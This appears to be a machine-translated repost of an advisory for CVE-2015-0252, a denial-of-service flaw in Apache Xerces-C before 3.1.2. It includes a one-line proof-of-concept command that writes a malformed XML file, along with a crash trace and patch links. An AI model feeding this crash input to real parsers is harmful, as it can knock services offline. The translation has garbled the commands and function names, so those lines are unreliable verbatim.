Apache Xerces-c xml Parser & lt; 3.1.2 DoS Vulnerability

Source: Internet
Author: User
Tags xml parser cve

Apache Xerces-c xml Parser <3.1.2 DoS Vulnerability
Apache Xerces-c xml Parser <3.1.2 DoS Vulnerability


Release date:
Updated on:

Affected Systems:

Apache Group Xerces C++ < 3.1.2

Description:

CVE (CAN) ID: CVE-2015-0252

Xerces is an open-source XML document parsing project promoted by the Apache organization. It currently has multiple language versions, including JAVA, C ++, PERL, and COM.

In versions earlier than Apache Xerces-C 3.1.2, internal/XMLReader. cpp has a security vulnerability. Remote attackers can exploit XML data to cause DoS (segmentation errors and crashes ).

<* Source: vendor
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Vendor () provides the following test methods:


# Exploit Title: Apache Xerces-c xml Parser (<3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendorhomepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE: CVE-2015-0252

Apache Xerces-c xml Parser Crashes on Malformed Input

I believe this to be the same issue that was reported on CVE-2015-0252,
Posting this in case anyone is interested in reproducing it.

Original advisory:
Https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

$ Printf "\ xff \ xfe \ x00 \ x00 \ x3c"> file. xml

$ DOMPrint./file. xml # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault

$./DOMPrint./file. xml # using Enabled build
========================================================== ======================================
= 6831 = ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c
At pc 0x836a721 bp 0xbf80000a8 sp 0xbf8000098
READ of size 1 at 0xb5d9d87c thread T0
#0 0x836a720 in xercesc_3_1: XMLReader: refreshRawBuffer ()
Xercesc/internal/XMLReader. cpp: 1719
#1 0x836a720 in xercesc_3_1: XMLReader: xcodeMoreChars (unsigned short *,
Unsigned char *, unsigned int) xercesc/internal/XMLReader. cpp: 1761
#2 0x837183f in xercesc_3_1: XMLReader: refreshCharBuffer ()
Xercesc/internal/XMLReader. cpp: 576
#3 0x837183f in xercesc_3_1: XMLReader: peekString (unsigned short
Const *) xercesc/internal/XMLReader. cpp: 1223
#4 0x83ad0ae in xercesc_3_1: ReaderMgr: peekString (unsigned short
Const *) xercesc/internal/ReaderMgr. hpp: 385
#5 0x83ad0ae in xercesc_3_1: xmlparser: checkXMLDecl (bool)
Xercesc/internal/xmlworkflow. cpp: 1608
#6 0x83b6469 in xercesc_3_1: xmllogs: scanProlog ()
Xercesc/internal/xmlworkflow. cpp: 1244
#7 0x8d69220 in
Xercesc_3_1: igxml1_:: scanDocument (xercesc_3_1: InputSource const &)
Xercesc/internal/igxmlworkflow. cpp: 206
#8 0x83cd3e7 in xercesc_3_1: xmldocument: scanDocument (unsigned short
Const *) xercesc/internal/xmlworkflow. cpp: 400
#9 0x83ce728 in xercesc_3_1: xmldocument: scanDocument (char const *)
Xercesc/internal/xmlworkflow. cpp: 408
#10 0x849afc5 in xercesc_3_1: AbstractDOMParser: parse (char const *)
Xercesc/parsers/AbstractDOMParser. cpp: 601
#11 0x8050bf2 in main src/DOMPrint. cpp: 398
#12 0xb6f5272d in _ libc_start_main
(/Lib/i386-linux-gnu/libc. so.6 + 0x1872d)
#13 0x805d3b5 (/ramdisk/DOMPrint + 0x805d3b5)

0xb5d9d87c is located 0 bytes to the right of 163964-byte region
[0xb5d75800, 0xb5d9d87c)
Allocated by thread T0 here:
#0 0xb72c3ae4 in operator new (unsigned int)
(/Usr/lib/i386-linux-gnu/libasan. so.1 + 0x51ae4)
#1 0x8340cce in xercesc_3_1: MemoryManagerImpl: allocate (unsigned int)
Xercesc/internal/MemoryManagerImpl. cpp: 40
#2 0x8094cb2 in xercesc_3_1: XMemory: operator new (unsigned int,
Xercesc_3_1: MemoryManager *) xercesc/util/XMemory. cpp: 68
#3 0x8daaaa7 in
Xercesc_3_1: igxml1_:: scanReset (xercesc_3_1: InputSource const &)
Xercesc/internal/IGXMLScanner2.cpp: 1284
#4 0x8d6912a in
Xercesc_3_1: igxml1_:: scanDocument (xercesc_3_1: InputSource const &)
Xercesc/internal/igxmlworkflow. cpp: 198
#5 0x83cd3e7 in xercesc_3_1: xmldocument: scanDocument (unsigned short
Const *) xercesc/internal/xmlworkflow. cpp: 400
#6 0x83ce728 in xercesc_3_1: xmldocument: scanDocument (char const *)
Xercesc/internal/xmlworkflow. cpp: 408
#7 0x849afc5 in xercesc_3_1: AbstractDOMParser: parse (char const *)
Xercesc/parsers/AbstractDOMParser. cpp: 601
#8 0x8050bf2 in main src/DOMPrint. cpp: 398
#9 0xb6f5272d in _ libc_start_main
(/Lib/i386-linux-gnu/libc. so.6 + 0x1872d)

SUMMARY: AddressSanitizer: heap-buffer-overflow
Xercesc/internal/XMLReader. cpp: 1719
Xercesc_3_1: XMLReader: refreshRawBuffer ()

Suggestion:

Vendor patch:

Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

Http://svn.apache.org/viewvc? View = revision & revision = 1667870

This article permanently updates the link address:

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.